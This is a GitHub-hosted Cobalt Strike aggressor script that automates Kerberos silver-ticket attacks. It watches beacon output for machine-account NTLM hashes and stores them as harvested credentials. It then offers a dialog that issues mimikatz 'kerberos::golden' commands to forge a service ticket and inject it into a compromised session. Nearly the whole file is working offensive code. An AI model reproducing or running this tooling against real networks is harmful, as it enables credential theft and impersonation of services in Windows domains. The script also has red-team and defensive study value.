-
Notifications
You must be signed in to change notification settings - Fork 162
/
silver-tickets.cna
79 lines (66 loc) · 2.89 KB
/
silver-tickets.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# author: bluescreenofjeff
#GUI to make Silver Tickets for a session. monitors output for machine hashes and adds them to the cred store
#set global settings so user, domain, sid, service, and purge settings persist across usage
%globalsettings['user'] = '';
%globalsettings['domain'] = 'example.local';
%globalsettings['domain-sid'] = 'S-1-5-21-000000000-1111111111-2222222222';
%globalsettings['service'] = 'cifs';
%globalsettings['purge'] = 'false';
#silver ticket monitor - monitors beacon output and adds machine accounts to cred store
on beacon_output {
if ($2 hasmatch 'Username : (.*\$).*[\n\r].*Domain : (.*)[\n\r].*NTLM : (.*)[\n\r]') {
local('$machineaccount $domain $machinehash');
$machineaccount = matched()[0];
$domain = matched()[1];
$machinehash = matched()[2];
credential_add($machineaccount,$machinehash,$domain,"Silver Ticket Monitor",binfo($1,"internal"));
}
}
#ticket generator gui
sub silver-ticket {
@bids = $1;
@machinescompromised = @();
#make list of machine hashes compromised, place in array
foreach $entry (credentials()) {
if ($entry['user'] ismatch '(.*)\$') {
$temp = matched()[0] . " - $entry['password']";
if ($temp !in @machinescompromised) {
add(@machinescompromised, matched()[0] . " - $entry['password']");
}
}
}
$dialog = dialog("Silver Ticket", %(user => %globalsettings['user'], domain => %globalsettings['domain'], domain-sid => %globalsettings['domain-sid'], service => %globalsettings['service'], purge => %globalsettings['purge']), lambda({
#save configurations to global settings
%globalsettings['user'] = $3['user'];
%globalsettings['domain'] = $3['domain'];
%globalsettings['domain-sid'] = $3['domain-sid'];
%globalsettings['service'] = $3['service'];
%globalsettings['purge'] = $3['purge'];
foreach $bid (@bids){
if ($3['purge'] eq 'true') {
binput($bid,'mimikatz kerberos::purge');
bmimikatz($bid,'kerberos::purge');
}
$targethost = split(' - ',$3['target'])[0];
$targethash = split(' - ',$3['target'])[1];
$mimikatz_command = "kerberos::golden /user: $+ $3['user'] /domain: $+ $3['domain'] /sid: $+ $3['domain-sid'] /target: $+ $targethost $+ \. $+ $3['domain'] /rc4: $+ $targethash /service: $+ $3['service'] /ptt";
binput($bid,"mimikatz $mimikatz_command");
bmimikatz($bid,$mimikatz_command);
};
}));
dialog_description($dialog, "This dialog generates a silver ticket for the chosen service and injects it into the current session.");
drow_text($dialog, "user", "User:");
drow_text($dialog, "domain", "Domain FQDN:");
drow_text($dialog, "domain-sid", "Domain SID:");
drow_combobox($dialog, "target", "Target Host:", @machinescompromised);
drow_text($dialog, "service", "Service:");
drow_checkbox($dialog, "purge", "Purge Kerberos Tray First?");
dbutton_action($dialog, "Build");
dialog_show($dialog);
}
#context menu
popup beacon_bottom {
item "Silver Ticket" {
silver-ticket($1);
}
}